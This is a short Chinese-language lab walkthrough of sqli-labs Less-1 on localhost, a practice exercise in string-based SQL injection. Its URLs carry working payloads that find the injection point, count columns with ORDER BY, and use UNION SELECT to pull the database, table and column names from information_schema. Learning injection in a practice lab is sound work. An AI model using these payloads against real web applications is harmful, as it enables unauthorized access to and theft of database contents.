sqli-libs-1字符型

http://localhost/Less-1/?id=1' 测试注入点,出现报错

数据库语句应该是:select ... from ... where id=’1’ ......

http://localhost/Less-1/?id=1'“   使用”不报错,判断为字符型注入,因此需要闭合字符串

http://localhost/Less-1/?id=1' order by 4 --+

http://localhost/Less-1/?id=1' order by 3 --+   猜测列数  3为正常 4为错误 此时位数为3

http://localhost/Less-1/?id=1' and 1=2 union select 1,2,3 --+ 利用报错看回显位置

此时2,3可回显数据,利用该位置来进行注入查询

http://localhost/Less-1/?id=1' and 1=2 union select 1,2,database() --+

查询数据库名字database()为 security

http://localhost/Less-1/?id=1' and 1=2 union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema='security') --+   

从 information_schema.tables 在 security 数据库中 查table_name


http://localhost/Less-1/?id=1' and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')--+

从 information_schema.colums 在 users 表名中 查column_name


你可能感兴趣的:(sqli-libs-1字符型)